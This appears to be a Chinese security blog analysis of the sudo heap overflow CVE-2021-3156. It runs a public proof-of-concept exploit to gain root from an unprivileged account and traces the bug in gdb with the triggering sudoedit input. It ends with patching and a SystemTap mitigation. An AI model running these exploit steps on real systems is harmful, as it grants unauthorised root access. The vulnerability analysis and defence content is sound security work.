文章来源: 天禧信安
useradd doge
su doge
whoami
# doge
sudo apt install git
# doge不在sudoers文件中。此事件将被报告
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich
#** CVE-2021-3156 PoC by blasty
#
# usage: ./sudo-hax-me-a-sandwich
#
# available targets:
# ------------------------------------------------------------
# 0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
# 1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
# 2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
# ------------------------------------------------------------
#
# manual mode:
# ./sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich 0
# ** CVE-2021-3156 PoC by blasty
#
# using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'](56, 54, 63, 212)
# ** pray for your rootshell.. **
# [+] bl1ng bl1ng! We got it!
whoami
# root
sudo apt install cgdb
wget https://github.com/sudo-project/sudo/archive/SUDO_1_9_5p1.tar.gz
tar xf SUDO_1_9_5p1.tar.gz
cd sudo-SUDO_1_9_5p1
mkdir build
cd build
../configure --enable-env-debug
make -j
sudo make install
sudo cgdb --args sudoedit -s '\' 1145141919810
# 一定要以root权限调试!
(gdb) b ../../../plugins/sudoers/sudoers.c:964
No source file named ../../../plugins/sudoers/sudoers.c.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (../../../plugins/sudoers/sudoers.c:964) pending.
(gdb) #注意,我现在位置一直是在build文件夹没变,这种相对路径要注意当前位置
/* set user_args */
if (NewArgc > 1) {
char *to, *from, **av;
size_t size, n;
/* Alloc and build up user_args. */
for (size = 0, av = NewArgv + 1; *av; av++)
size += strlen(*av) + 1;
if (size == 0 || (user_args = malloc(size)) == NULL) {
sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
debug_return_int(NOT_FOUND_ERROR);
}
if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { //**gdb断在此处**
/*
* When running a command via a shell, the sudo front-end
* escapes potential meta chars. We unescape non-spaces
* for sudoers matching and logging purposes.
*/
for (to = user_args, av = NewArgv + 1; (from = *av); av++) {
while (*from) {
if (from[0] == '\\' && !isspace((unsigned char)from[1]))
from++;
*to++ = *from++;
}
*to++ = ' ';
}
*--to = '\0';
}
/* Alloc and build up user_args. */
for (size = 0, av = NewArgv + 1; *av; av++)
size += strlen(*av) + 1;
if (size == 0 || (user_args = malloc(size)) == NULL) {
sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
debug_return_int(NOT_FOUND_ERROR);
}
(gdb) p size
$1 = 16
(gdb) p NewArgv
$2 = (char **) 0x55c42f87f708
(gdb) p NewArgv+25
$3 = (char **) 0x55c42f87f7d0
(gdb) x/8xg 0x55c42f87f7d0
0x55c42f87f7d0: 0x00007f041be3fca0 0x00007f041be3fca0
0x55c42f87f7e0: 0x0000000000000000 0x0000000000000c21
0x55c42f87f7f0: 0x00007f041be3fca0 0x00007f041be3fca0
0x55c42f87f800: 0x0000000000000000 0x0000000000000000
user_args
for (to = user_args, av = NewArgv + 1; (from = *av); av++) {
while (*from) {
//注意if判断
if (from[0] == '\\' && !isspace((unsigned char)from[1]))
from++;
*to++ = *from++;
}
*to++ = ' ';
}
if (from[0] == '\\' && !isspace((unsigned char)from[1]))
from++;
(gdb) p NewArgv[1]
$4 = 0x7ffec3f74315 "\\"
(gdb) x/20xb 0x7ffec3f74315
0x7ffec3f74315: 0x5c 0x00 0x31 0x31 0x34 0x35 0x31 0x34
0x7ffec3f7431d: 0x31 0x39 0x31 0x39 0x38 0x31 0x30 0x00
0x7ffec3f74325: 0x43 0x4c 0x55 0x54
(gdb) p size
$1 = 16
(gdb) b ../../../plugins/sudoers/sudoers.c:978
Breakpoint 2 at 0x7ff42c055f01: file ../../../plugins/sudoers/sudoers.c, line 978.
(gdb) c
Continuing.
Breakpoint 2, set_cmnd () at ../../../plugins/sudoers/sudoers.c:978
(gdb) p to
$5 = 0x5572bbba57ec " "
(gdb) p 0x5572bbba57ec-0x5572bbba57d0
$6 = 28
(gdb) #我虚拟机中途重启过一次,因此内存
(gdb) #地址有变动。在系统未重启的情况下
(gdb) #0x5572bbba57d0这个地址应为上面
(gdb) #计算出的user_args的地址
(gdb) #(即0x55c42f87f7d0)
(gdb) x/8xg 0x5572bbba57d0
0x5572bbba57d0: 0x3134313534313100 0x3120303138393139
0x5572bbba57e0: 0x3139313431353431 0x0000002030313839
0x5572bbba57f0: 0x00007ff42daabca0 0x00007ff42daabca0
0x5572bbba5800: 0x0000000000000000 0x0000000000000000
sudo apt update
sudo apt upgrade #或sudo apt install sudo
yum install systemtap yum-utils kernel-devel-"$(uname -r)"
vim sudoedit.stap
# 写入以下内容:
# probe process("/usr/bin/sudo").function("main") {
# command = cmdline_args(0,0,"");
# if (strpos(command, "edit") >= 0) {
# raise(9);
# }
# }
nohup stap -g sudoedit.stap &
# 注意,上述措施会在重启后失效
# 如果安装了补丁程序,可以用以下办法撤销临时措施:
kill -s SIGTERM systemtap进程PID
推荐文章++++
*CVE-2020-28243 SaltStack Minion本地特权提升漏洞分析